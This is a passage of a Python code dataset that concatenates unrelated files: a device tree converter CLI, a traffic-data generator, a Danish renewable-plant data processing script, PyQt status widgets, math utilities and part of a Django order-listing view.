_server.serve_forever()","sub_path":"wsgi_server.py","file_name":"wsgi_server.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546521538","text":"#!/usr/bin/env python\n\n# Copyright 2017 Martin Olejar\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport fdt\nimport click\n\n# Application error code\nERROR_CODE = 1\n\n# The version of u-boot tools\nVERSION = fdt.__version__\n\n# Short description of DTC tool\nDESCRIP = (\n \"Device Tree Converter tool for converting FDT blob (*.dtb) to readable text file (*.dts) and reverse\"\n)\n\n\n# Base options\n@click.group(context_settings=dict(help_option_names=['-?', '--help']), help=DESCRIP)\n@click.version_option(VERSION, '-v', '--version')\ndef cli():\n click.echo()\n\n\n@cli.command(short_help=\"Convert *.dtb to *.dts\")\n@click.argument('infile', nargs=1, type=click.Path(exists=True))\n@click.option('-t', '--tabsize', type=click.INT, default=4, show_default=True, help=\"Tabulator Size\")\n@click.option('-o', '--outfile', type=click.Path(), default=None, help=\"Output path/file name (*.dts)\")\ndef todts(outfile, infile, tabsize):\n \"\"\" Convert device tree binary blob (*.dtb) into readable text file (*.dts) \"\"\"\n fdt_obj = None\n\n if outfile is None:\n outfile = os.path.splitext(os.path.basename(infile))[0] + \".dts\"\n\n try:\n with open(infile, 'rb') as f:\n try:\n fdt_obj = fdt.parse_dtb(f.read())\n except:\n raise Exception('Not supported file format: {}'.format(infile))\n\n with open(outfile, 'w') as f:\n f.write(fdt_obj.to_dts(tabsize))\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" DTS saved as: 
%s\" % outfile)\n\n\n@cli.command(short_help=\"Convert *.dts to *.dtb\")\n@click.argument('infile', nargs=1, type=click.Path(exists=True))\n@click.option('-v', '--version', type=click.INT, default=None, help=\"DTB Version\")\n@click.option('-l', '--lcversion', type=click.INT, default=None, help=\"DTB Last Compatible Version\")\n@click.option('-c', '--cpuid', type=click.INT, default=None, help=\"Boot CPU ID\")\n@click.option('-a', '--align', type=click.INT, default=None, help=\"Make the blob align to the \")\n@click.option('-p', '--padding', type=click.INT, default=None, help=\"Add padding to the blob of long\")\n@click.option('-s', '--size', type=click.INT, default=None, help=\"Make the blob at least long\")\n@click.option('-o', '--outfile', type=click.Path(), default=None, help=\"Output path/file name (*.dtb)\")\ndef todtb(outfile, infile, version, lcversion, cpuid, align, padding, size):\n \"\"\" Convert device tree as readable text file (*.dts) into binary blob (*.dtb) \"\"\"\n fdt_obj = None\n\n if outfile is None:\n outfile = os.path.splitext(os.path.basename(infile))[0] + \".dtb\"\n\n try:\n if version is not None and version > fdt.Header.MAX_VERSION:\n raise Exception(\"DTB Version must be lover or equal {} !\".format(fdt.Header.MAX_VERSION))\n\n with open(infile, 'r') as f:\n try:\n fdt_obj = fdt.parse_dts(f.read(), os.path.dirname(infile))\n except:\n raise Exception('Not supported file format: {}'.format(infile))\n\n raw_data = fdt_obj.to_dtb(version, lcversion, cpuid)\n\n if align is not None:\n if size is not None:\n raise Exception(\"The \\\"-a/--align\\\" option can't be used together with \\\"-s/--size\\\"\")\n if not align % 2:\n raise Exception(\"The \\\"-a/--align\\\" option must be dividable with two !\")\n if len(raw_data) % align:\n raw_data += bytes([0] * (len(raw_data) % align))\n\n if padding is not None:\n if align is not None:\n raise Exception(\"The \\\"-p/--padding\\\" option can't be used together with \\\"-a/--align\\\"\")\n raw_data += bytes([0] * padding)\n\n if size is not None:\n if size < len(raw_data):\n raise Exception(\"The \\\"-s/--size\\\" option must be > {}\".format(len(raw_data)))\n raw_data += bytes([0] * (size - len(raw_data)))\n\n with open(outfile, 'wb') as f:\n f.write(raw_data)\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" DTB saved as: %s\" % outfile)\n\n\n@cli.command(short_help=\"Merge two and more *.dtb or *.dts files\")\n@click.argument('outfile', nargs=1, type=click.Path())\n@click.argument('infiles', nargs=-1, type=click.Path(exists=True))\n@click.option('-t', '--tabsize', type=click.INT, default=4, show_default=True, help=\"Tabulator Size\")\n@click.option('-i', '--intype', type=click.Choice(['auto', 'dts', 'dtb']),\n default='auto', show_default=True, help=\"Input file type\")\ndef merge(outfile, infiles, tabsize, intype):\n \"\"\" Merge two and more *.dtb or *.dts files into one *.dts file \"\"\"\n def open_fdt(file_path, file_type):\n if file_type == 'auto':\n if file_path.endswith(\".dtb\"):\n file_type = 'dtb'\n elif file_path.endswith(\".dts\"):\n file_type = 'dts'\n else:\n raise Exception('Not supported file extension: {}'.format(file_path))\n try:\n if file_type == 'dtb':\n with open(file_path, 'rb') as f:\n obj = fdt.parse_dtb(f.read())\n else:\n with open(file_path, 'r') as f:\n obj = fdt.parse_dts(f.read(), os.path.dirname(file_path))\n except Exception as e:\n raise Exception('Not supported file format: {} {}'.format(file_path, 
\n fdt_obj = None\n\n if not infiles:\n click.echo(\"Usage: pydtc merge [OPTIONS] OUTFILE [INFILES]...\")\n click.echo(\"\\nError: Missing argument \\\"infiles\\\"\")\n sys.exit(ERROR_CODE)\n\n if len(infiles) < 2:\n click.echo(\"Usage: pydtc merge [OPTIONS] OUTFILE [INFILES]...\")\n click.echo(\"\\nError: Minimum is two \\\"infiles\\\"\")\n sys.exit(ERROR_CODE)\n\n try:\n for file in infiles:\n if fdt_obj is None:\n fdt_obj = open_fdt(file, intype)\n else:\n fdt_obj.merge(open_fdt(file, intype))\n\n with open(outfile, 'w') as f:\n f.write(fdt_obj.to_dts(tabsize))\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" Merge output saved as: %s\" % outfile)\n\n\n@cli.command(short_help=\"Compare two *.dtb or *.dts files\")\n@click.argument('file1', nargs=1, type=click.Path(exists=True))\n@click.argument('file2', nargs=1, type=click.Path(exists=True))\n@click.option('-t', '--intype', type=click.Choice(['auto', 'dts', 'dtb']),\n default='auto', show_default=True, help=\"Input file type\")\n@click.option('-o', '--outdir', type=click.Path(), default=None, help=\"Output directory/path [default: diff_out]\")\ndef diff(file1, file2, intype, outdir):\n \"\"\" Compare two *.dtb or *.dts files \"\"\"\n\n def open_fdt(file_path, file_type):\n if file_type == 'auto':\n if file_path.endswith(\".dtb\"):\n file_type = 'dtb'\n elif file_path.endswith(\".dts\"):\n file_type = 'dts'\n else:\n raise Exception('Not supported file extension: {}'.format(file_path))\n try:\n if file_type == 'dtb':\n with open(file_path, 'rb') as f:\n obj = fdt.parse_dtb(f.read())\n else:\n with open(file_path, 'r') as f:\n obj = fdt.parse_dts(f.read(), os.path.dirname(file_path))\n except:\n raise Exception('Not supported file format: {}'.format(file_path))\n\n return obj\n\n try:\n # load input files\n fdt1 = open_fdt(file1, intype)\n fdt2 = open_fdt(file2, intype)\n # compare it\n diff = fdt.diff(fdt1, fdt2)\n if diff[0].empty:\n click.echo(\" Input files are completely different !\")\n sys.exit()\n # create output directory\n if outdir is None:\n outdir = \"diff_out\"\n os.makedirs(outdir, exist_ok=True)\n # save the diff\n file_name = (\n \"same.dts\",\n os.path.splitext(os.path.basename(file1))[0] + \".dts\",\n os.path.splitext(os.path.basename(file2))[0] + \".dts\")\n for index, obj in enumerate(diff):\n if not obj.empty:\n with open(os.path.join(outdir, file_name[index]), 'w') as f:\n f.write(obj.to_dts())\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" Diff output saved into: %s\" % outdir)\n\n\ndef main():\n cli(obj={})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fdt/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"127529953","text":"import random\nimport json\nimport datetime\nimport config\nimport pprint\n\n# base epoch of the generated window, in milliseconds: 1453379348690\n
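# Each iteration below simulates one minute of traffic: a record with 1-10 random\n# vehicle passages plus per-lane aggregates and length/speed classifications.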
\nfor x in range(60):\n d = dict()\n timestamp = 1453379348 + 60*x\n dt = datetime.datetime.fromtimestamp(timestamp)\n d['timestamp'] = timestamp\n d['panid'] = 20257\n d['device'] = 20257\n d['domain'] = 'INTEREXPORT'\n d['vehicles'] = []\n for _ in range(random.randint(1,10)):\n v = dict()\n v['timestamp'] = random.randint(timestamp, timestamp+60)\n v['lane'] = random.randint(1, 3)\n v['inverse'] = False\n v['length'] = random.uniform(2,9)\n v['speed'] = random.uniform(10,100)\n v['occupancy'] = random.randint(300,500)\n v['headway'] = random.randint(800,3000)\n v['gap'] = random.uniform(10,50)\n d['vehicles'].append(v)\n aggr = []\n i = 1\n aggr.append([x for x in d['vehicles'] if x['lane'] == 1])\n aggr.append([x for x in d['vehicles'] if x['lane'] == 2])\n aggr.append([x for x in d['vehicles'] if x['lane'] == 3])\n d['aggregate'] = []\n d['classifier_length'] = []\n d['classifier_speed'] = []\n for lane in aggr:\n l = dict()\n l['lane'] = i\n l['intensity'] = len(lane)\n l['occupancy'] = sum((veh['occupancy'] for veh in lane))/6000\n if len(lane) > 0:\n l['avgSpeed'] = sum((veh['speed'] for veh in lane))/len(lane)\n l['avgLength'] = sum((veh['length'] for veh in lane))/len(lane)\n l['avgHeadway'] = sum((veh['headway'] for veh in lane))/len(lane)\n l['avgGap'] = sum((veh['gap'] for veh in lane))/len(lane)\n else:\n l['avgSpeed'] = 0\n l['avgLength'] = 0\n l['avgHeadway'] = 0\n l['avgGap'] = 0\n d['aggregate'].append(l)\n cl = dict()\n cl['lane'] = i\n cl['short'] = len([x for x in lane if x['length'] <= 4])\n cl['medium'] = len([x for x in lane if x['length'] > 4 and x['length'] <=6])\n cl['large'] = len([x for x in lane if x['length'] > 6])\n d['classifier_length'].append(cl)\n cs = dict()\n cs['lane'] = i\n cs['less_60'] = len([x for x in lane if x['speed'] <= 60])\n cs['between_60_and_100'] = len([x for x in lane if x['speed'] > 60 and x['speed'] <= 100])\n cs['over_100'] = len([x for x in lane if x['speed'] > 100])\n d['classifier_speed'].append(cs)\n i = i+1\n with open(\"LaMarina{}.json\".format(dt.strftime(\"%d%m%Y%H%M%S\")), 'w') as f:\n json.dump(d, f)\n","sub_path":"generate_entries.py","file_name":"generate_entries.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"471166267","text":"import logging\nimport os\nimport posixpath\nimport urllib.parse\nimport urllib.request\nimport re\nimport zipfile\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nimport utm # for transforming geoinformation in the utm format\nimport requests\nfrom string import Template\nfrom IPython.display import display\nfrom pathlib import Path\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d %b %Y %H:%M:%S'\n)\n\nlogger = logging.getLogger()\n\nfof = os.path.realpath(__file__)\npath = os.path.split(fof)[0][:-2]\n\n# Get column translation list\ncolumnnames = pd.read_csv(os.path.join('input', path + 'service\\\\' + 'column_translation_list.csv'))\ncolumnnames.head(2)\n\n# Get value translation list\nvaluenames = pd.read_csv(os.path.join('input', path + 'service\\\\' + 'value_translation_list.csv'))\nvaluenames.head(2)\n\n\ndef download_and_cache(url, session=None):\n \"\"\"This function downloads a file into a folder called \n original_data and returns the local filepath.\"\"\"\n path = urllib.parse.urlsplit(url).path\n filename = posixpath.basename(path)\n filepath = os.path.join('input', 'original_data', filename)\n\n # check if file exists, if not download it\n if not os.path.exists(filepath):\n if not session:\n print('No session')\n session = requests.session()\n\n r = session.get(url, stream=True)\n\n chuncksize = 1024\n with open(filepath, 'wb') as file:\n for chunck in r.iter_content(chuncksize):\n file.write(chunck)\n filepath = '' + filepath\n return filepath\n\ndef check_file_existence(url):\n hh = url.split('/')[-1]\n ff = './input/' + hh\n try:\n file = 
open(ff)\n file.close()\n link = url.split('/')[-1]\n except:\n r = requests.get(url).status_code\n if r != 200: print('Invalid file path: ' + '\"' + url + '\"')\n return\n link = url\n return link\n\ndef main():\n # Here you need to specify the path with the location of the files on the Internet\n\n DK_ens = 'https://ens.dk/sites/ens.dk/files/Vindenergi/anlaegprodtilnettet.xls'\n DK_energinet = 'https://www.energinet.dk/-/media/Energinet/El-CSI/Dokumenter/Data/SolcellerGraf-2016-11.xlsx'\n DK_geo = 'http://download.geonames.org/export/zip/DK.zip'\n\n url_DK_ens = check_file_existence(DK_ens)\n url_DK_energinet = check_file_existence(DK_energinet)\n url_DK_geo = check_file_existence(DK_geo)\n \n # Get wind turbines data\n DK_wind_df = pd.read_excel('./input/' + url_DK_ens,\n sheet_name='IkkeAfmeldte-Existing turbines',\n thousands='.',\n header=17,\n skipfooter=3,\n usecols=16,\n converters={'Møllenummer (GSRN)': str,\n 'Kommune-nr': str,\n 'Postnr': str}\n )\n\n # Get photovoltaic data\n DK_solar_df = pd.read_excel('./input/' + url_DK_energinet, \n sheet_name='Data',\n converters={'Postnr': str}\n )\n\n # Choose the translation terms for Denmark, create dictionary and show dictionary\n idx_DK = columnnames[columnnames['country'] == 'DK'].index\n column_dict_DK = columnnames.loc[idx_DK].set_index('original_name')['opsd_name'].to_dict()\n\n # Windows has problems reading the csv entry for east and north (DK).\n # The reason might be the difference when opening the csv between linux and\n # windows.\n column_dict_DK_temp = {}\n for k, v in column_dict_DK.items():\n column_dict_DK_temp[k] = v\n if v == 'utm_east' or v == 'utm_north':\n # merge 2 lines to 1\n new_key = ''.join(k.splitlines())\n column_dict_DK_temp[new_key] = v\n\n column_dict_DK = column_dict_DK_temp\n\n column_dict_DK\n\n # Translate columns by list\n DK_wind_df['X (øst) koordinat UTM 32 Euref89'] = DK_wind_df['X (øst) koordinat \\nUTM 32 Euref89']\n DK_wind_df['Y (nord) koordinat UTM 32 Euref89'] = DK_wind_df['Y (nord) koordinat \\nUTM 32 Euref89']\n\n #and 13 are the keys that make problems\n DK_wind_df.drop(DK_wind_df.columns[[12, 13]], axis=1, inplace=True)\n\n # Replace column names based on column_dict_DK\n DK_wind_df.rename(columns=column_dict_DK, inplace=True)\n DK_solar_df.rename(columns=column_dict_DK, inplace=True)\n\n # Add names of the data sources to the DataFrames\n DK_wind_df['data_source'] = 'Energistyrelsen'\n DK_solar_df['data_source'] = 'Energinet.dk'\n\n # Add energy source level 2 and technology for each of the two DataFrames\n DK_wind_df['energy_source_level_2'] = 'Wind'\n DK_solar_df['energy_source_level_2'] = 'Solar'\n DK_solar_df['technology'] = 'Photovoltaics'\n\n # Choose the translation terms for Denmark, create dictionary and show dictionary\n idx_DK = valuenames[valuenames['country'] == 'DK'].index\n value_dict_DK = valuenames.loc[idx_DK].set_index('original_name')['opsd_name'].to_dict()\n value_dict_DK\n\n # Replace all original value names by the OPSD value names\n DK_wind_df.replace(value_dict_DK, inplace=True)\n\n # Index for all values with utm information\n idx_notnull = DK_wind_df['utm_east'].notnull()\n\n # Convert from UTM values to latitude and longitude coordinates\n DK_wind_df['lonlat'] = DK_wind_df.loc[idx_notnull, ['utm_east', 'utm_north']\n ].apply(lambda x: utm.to_latlon(x[0],\n x[1],\n 32,\n 'U'), axis=1).astype(str)\n\n # Split latitude and longitude in two columns\n lat = []\n lon = []\n\n for row in DK_wind_df['lonlat']:\n try:\n # Split tuple format\n # into the column lat 
and lon\n row = row.lstrip('(').rstrip(')')\n lat.append(row.split(',')[0])\n lon.append(row.split(',')[1])\n except:\n # set NAN\n lat.append(np.NaN)\n lon.append(np.NaN)\n\n DK_wind_df['lat'] = pd.to_numeric(lat)\n DK_wind_df['lon'] = pd.to_numeric(lon)\n\n # drop lonlat column that contains both latitude and longitude\n DK_wind_df.drop('lonlat', axis=1, inplace=True)\n\n\n # Get geo-information\n zip_DK_geo = zipfile.ZipFile('./input/' + url_DK_geo)\n\n # Read generated postcode/location file\n DK_geo = pd.read_csv(zip_DK_geo.open('DK.txt'), sep='\\t', header=None)\n\n # add column names as defined in associated readme file\n DK_geo.columns = ['country_code', 'postcode', 'place_name', 'admin_name1',\n 'admin_code1', 'admin_name2', 'admin_code2', 'admin_name3',\n 'admin_code3', 'lat', 'lon', 'accuracy']\n\n # Drop rows of possible duplicate postal_code\n DK_geo.drop_duplicates('postcode', keep='last', inplace=True)\n DK_geo['postcode'] = DK_geo['postcode'].astype(str)\n\n # Add longitude/latitude information assigned by postcode (for Energinet.dk data)\n DK_solar_df = DK_solar_df.merge(DK_geo[['postcode', 'lon', 'lat']],\n on=['postcode'],\n how='left')\n\n # Show number of units with missing coordinates separated by wind and solar\n print('Missing Coordinates DK_wind ', DK_wind_df.lat.isnull().sum())\n print('Missing Coordinates DK_solar ', DK_solar_df.lat.isnull().sum())\n\n # Merge DataFrames for wind and solar into DK_renewables\n dataframes = [DK_wind_df, DK_solar_df]\n DK_renewables = pd.concat(dataframes)\n DK_renewables = DK_renewables.reset_index()\n\n # Assign energy source level 1 to the dataframe\n DK_renewables['energy_source_level_1'] = 'Renewable energy'\n\n # Select those columns of the original data which are utilised further\n column_interest = ['commissioning_date', 'energy_source_level_1', 'energy_source_level_2',\n 'technology', 'electrical_capacity_kW', 'dso', 'gsrn_id', 'postcode',\n 'municipality_code', 'municipality', 'address', 'address_number',\n 'utm_east', 'utm_north', 'lon', 'lat', 'hub_height',\n 'rotor_diameter', 'manufacturer', 'model', 'data_source']\n\n # Clean DataFrame from columns other than specified above\n DK_renewables = DK_renewables.loc[:, column_interest]\n DK_renewables.reset_index(drop=True, inplace=True)\n\n # kW to MW\n DK_renewables['electrical_capacity_kW'] /= 1000\n\n # adapt column name\n DK_renewables.rename(columns={'electrical_capacity_kW': 'electrical_capacity'},\n inplace=True)\n\n DK_renewables.to_pickle('output/DK_renewables.pickle')\n DK_renewables.to_csv('output/DK_renewables.csv',sep=';', index=False, encoding='utf-8-sig', mode='w', header=True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"DK/download_and_ process.py","file_name":"download_and_ process.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85027575","text":"import numpy as np\r\nimport math as m\r\nfrom typing import List, Tuple, Union\r\nfrom functools import lru_cache\r\n\r\n\r\n# import ray.rays_pool as rays_pool\r\n\r\n\r\nclass Generator:\r\n\r\n @staticmethod\r\n @lru_cache()\r\n def get_rot_mat2d_cashed_int(tetha:int):\r\n tetha = np.deg2rad(int(tetha))\r\n return Generator.get_rot_mat_2d(tetha)\r\n\r\n @staticmethod\r\n def get_rot_mat_2d(tetha: float):\r\n s, c = np.sin(tetha), np.cos(tetha)\r\n return np.array(\r\n ((c, -s),\r\n (s, c))\r\n )\r\n
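\r\n # e.g. get_rot_mat_2d(np.pi / 2) maps the vector (1, 0) to roughly (0, 1): a quarter turn\r\n # counter-clockwise, the right-handed convention used by all rotation matrices below.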
\r\n @staticmethod\r\n def get_rot_mat_x_3d(a: float):\r\n \"\"\"Right-handed system. Rotation counter-clockwise\"\"\"\r\n Mx = (\r\n (1, 0, 0),\r\n (0, m.cos(a), -m.sin(a)),\r\n (0, m.sin(a), m.cos(a))\r\n )\r\n return Mx\r\n\r\n @staticmethod\r\n def get_rot_mat_y_3d(b: float):\r\n \"\"\"Right-handed system. Rotation counter-clockwise\"\"\"\r\n My = (\r\n (m.cos(b), 0, m.sin(b)),\r\n (0, 1, 0),\r\n (-m.sin(b), 0, m.cos(b))\r\n )\r\n return My\r\n\r\n @staticmethod\r\n def get_rot_mat_z_3d(g: float):\r\n \"\"\"Right-handed system. Rotation counter-clockwise\"\"\"\r\n Mz = (\r\n (m.cos(g), -m.sin(g), 0),\r\n (m.sin(g), m.cos(g), 0),\r\n (0, 0, 1),\r\n )\r\n return Mz\r\n\r\n @staticmethod\r\n def get_rot_mat_3d(a: float, b: float, g: float):\r\n \"\"\"Right-handed system. Rotation counter-clockwise\"\"\"\r\n return Generator.get_rot_mat_x_3d(a), Generator.get_rot_mat_y_3d(b), Generator.get_rot_mat_z_3d(g)\r\n\r\n @staticmethod\r\n def get_euler_rot_matrix(alpha: float, beta: float, gamma: float):\r\n return np.matmul(Generator.get_rot_mat_z_3d(alpha),\r\n np.matmul(Generator.get_rot_mat_x_3d(beta),\r\n Generator.get_rot_mat_z_3d(gamma)))\r\n\r\n @staticmethod\r\n def rot_shift_mat(rot_coef: (List[Union[float, int]], Tuple[Union[float, int]], np.ndarray),\r\n shift_coef: (List[Union[float, int]], Tuple[Union[float, int]], np.ndarray) = (0, 0, 0)) \\\r\n -> np.ndarray:\r\n if len(rot_coef) != 3 or len(shift_coef) != 3:\r\n raise AttributeError(\r\n \"Coefficients are in the wrong dimension. \" +\r\n \"rot_coef(%d),shift_coef(%d)\" % (len(rot_coef), len(shift_coef)))\r\n if not all((isinstance(i, float) or isinstance(i, int))\r\n and (isinstance(j, float) or isinstance(j, int))\r\n for i, j in zip(rot_coef, shift_coef)):\r\n raise TypeError(\"Some element in rot_coef or shift_coef is not float or int\")\r\n\r\n cos_r_c = [np.cos(arg) for arg in rot_coef]\r\n sin_r_c = [np.sin(arg) for arg in rot_coef]\r\n\r\n rot_mat_x = [\r\n [1, 0, 0],\r\n [0, cos_r_c[0], -sin_r_c[0]],\r\n [0, sin_r_c[0], cos_r_c[0]]\r\n ]\r\n rot_mat_y = [\r\n [cos_r_c[1], 0, sin_r_c[1]],\r\n [0, 1, 0],\r\n [-sin_r_c[1], 0, cos_r_c[1]]\r\n ]\r\n rot_mat_z = [\r\n [cos_r_c[2], -sin_r_c[2], 0],\r\n [sin_r_c[2], cos_r_c[2], 0],\r\n [0, 0, 1]\r\n ]\r\n coord_transform = np.ndarray((4, 4))\r\n coord_transform[:3, :3] = np.matmul(np.matmul(rot_mat_x, rot_mat_y), rot_mat_z)\r\n coord_transform[:3, 3] = shift_coef\r\n return coord_transform\r\n\r\n @staticmethod\r\n def nd_generator(begin: list | tuple | np.ndarray, end: list | tuple | np.ndarray, cnt_per_param: list | tuple):\r\n \"\"\"begin and end elements must be numbers\"\"\"\r\n linspace_values = [\r\n np.linspace(begin[i], end[i], cnt_per_param[i], endpoint=True)\r\n for i in range(len(end))\r\n ]\r\n j_ind = np.zeros(shape=len(end), dtype=int)\r\n while True:\r\n cur_values = [linspace_values[j][j_ind[j]] for j in range(len(end))]\r\n yield cur_values\r\n for i in range(len(end)):\r\n j_ind[i] = j_ind[i] + 1\r\n if j_ind[i] == cnt_per_param[i]:\r\n j_ind[i] = 0\r\n continue\r\n break\r\n else: # the for completed without break - every counter wrapped around and we saw the 
j_ind array become like np.zeros\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n begin = np.asarray((0, 0, 0))\r\n end = np.asarray((5, 4, 3))\r\n cnt_per_param = (6, 5, 4)\r\n for i in Generator.nd_generator(begin, end, cnt_per_param):\r\n print(i)","sub_path":"tools/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351399112","text":"import threading\nfrom multiprocessing import Queue\n\n\nclass TaskManager(object):\n INSTANCE = None\n UrlQueue = Queue()\n DataQueue = Queue()\n\n lock = threading.RLock()\n\n def __new__(cls):\n cls.lock.acquire()\n if cls.INSTANCE is None:\n cls.INSTANCE = super(TaskManager, cls).__new__(cls)\n cls.lock.release()\n return cls.INSTANCE\n\nif __name__ == \"__main__\":\n a = TaskManager()\n b = TaskManager()\n print(id(a.DataQueue))\n print(id(b.DataQueue))\n print(id(a.UrlQueue))\n print(id(b.UrlQueue))\n","sub_path":"TaskManager.py","file_name":"TaskManager.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"335459508","text":"from PyQt5.QtWidgets import QLabel, QDesktopWidget\nfrom PyQt5 import QtCore\n\n\nclass EngMode(QLabel):\n def __init__(self, widget):\n super().__init__('', widget)\n self.setStyleSheet('background-color: #F2A408; font-size: 20px; border: 3px outset #9C9C9C;')\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.blink)\n self.blinked = False\n\n def blink(self):\n self.setText('') if self.blinked else self.setText('Engineering Mode')\n self.blinked = not self.blinked\n\n def setOn(self):\n self.show()\n self.timer.start(1000)\n\n def setOff(self):\n self.hide()\n self.timer.stop()\n\n\nclass PLCState(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setStyleSheet('background-color: #BFCDDB; font-size: 20px; border: 3px outset #9C9C9C;')\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n\n def setState(self, state):\n if state == 0:\n self.setText('The Machine is Idle')\n elif state == 1:\n self.setText('The Machine is Initializing')\n elif state == 2:\n self.setText('The Machine is Ready')\n elif state == 3:\n self.setText('The Machine Works')\n elif state == 4:\n self.setText('The Machine is Paused')\n elif state == 5:\n self.setText('The Machine is Halted')\n\n\nclass MachineError(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.setStyleSheet('background-color: #BFCDDB; font-size: 16px; border: 3px outset #9C9C9C;')\n\nclass GoldenSample(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.setStyleSheet('background-color: #F2A408; font-size: 16px; border: 3px outset #9C9C9C;')\n","sub_path":"Miscs.py","file_name":"Miscs.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146712134","text":"class Solution:\n def goodDaysToRobBank(self, security: List[int], time: int) -> List[int]:\n left, right = [0]*len(security), [0]*len(security)\n for i in range(1, len(security)):\n if security[i-1] >= security[i]:\n left[i] = left[i-1]+1\n else:\n left[i] = 0\n\n for i in reversed(range(len(security)-1)):\n if 
security[i] <= security[i+1]:\r\n right[i] = right[i+1]+1\r\n else:\r\n right[i] = 0\r\n\r\n res = []\r\n for i in range(len(security)):\r\n if left[i] >= time and right[i] >= time:\r\n res.append(i)\r\n return res\r\n","sub_path":"stack/2100_Find_Good_Days_to_Rob_the_Bank.py","file_name":"2100_Find_Good_Days_to_Rob_the_Bank.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"342737865","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport datetime\n\nfrom django.views.generic import TemplateView\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.decorators import method_decorator\nimport xlrd\n\nfrom luckycommon.order.handler import show_order\n\nfrom luckycommon.push import handler as push_handler\nfrom luckycommon.cache import redis_cache\nfrom luckycommon.db.goods import get_goods\nfrom luckycommon.db.activity import get_activity\nfrom luckycommon.account.db.account import get_account\nfrom luckycommon.order.model.order import ORDER_STATUS\nfrom luckycommon.order.db import order as db\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.api import token_required, check_params\nfrom luckycommon.utils.tz import utc_to_local_str\nfrom luckycommon.utils.exceptions import SmsPlatformError, NotImplementedError\nfrom luckycommon.utils.export import redirect_to_file, gen_filename\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass OrderView(TemplateView):\n\n def get(self, req):\n query_dct = req.GET.dict()\n export = query_dct.pop('$export', None)\n resp_items = []\n\n if export:\n filename = gen_filename('export_order')\n status = query_dct.get('status')\n data = None\n if status and int(status) == ORDER_STATUS.WAIT_SHIP:\n cn_header = [u'订单ID', u'用户ID', u'收货人', u'省', u'市', u'县',\n u'街道', u'送货地址', u'收货人手机号', u'商品编号',\n u'商品名称', u'备注']\n data = db.export_awarded_orders(query_dct)\n elif status and int(status) == ORDER_STATUS.AWARDED:\n cn_header = [u'订单ID', u'用户ID', u'收货人', u'省', u'市', u'县',\n u'街道', u'送货地址', u'收货人手机号', u'商品编号',\n u'商品名称', u'备注']\n data = db.export_awarded_orders(query_dct)\n elif status and int(status) == ORDER_STATUS.WAIT_RECEIPT:\n cn_header = [u'发货时间', u'订单ID', u'用户ID', u'活动名称',\n u'快递名', u'快递单号', u'供货商', u'购买价格']\n data = db.export_sent_orders(query_dct)\n if data:\n return redirect_to_file(data, cn_header, filename)\n else:\n raise NotImplementedError('not supported')\n\n # normal\n items, total_count, award_only = db.list_orders(query_dct, True)\n for item in items:\n order, is_virtual = item\n k = order.as_dict()\n if award_only:\n k['id'] = str(k.pop('order_id'))\n k['buyer'] = str(k.pop('user_id'))\n else:\n k['id'] = str(k['id'])\n k['buyer'] = str(k['buyer'])\n activity = get_activity(k['activity_id'])\n k['is_virtual'] = is_virtual\n k['activity_name'] = activity.name\n k['term_number'] = activity.term_number\n k['target_amount'] = activity.target_amount\n k['updated_at'] = utc_to_local_str(k['updated_at'])\n k['created_at'] = utc_to_local_str(k['created_at'])\n resp_items.append(k)\n\n return {'list': resp_items, 'page': query_dct.get('$page', 1),\n 'size': 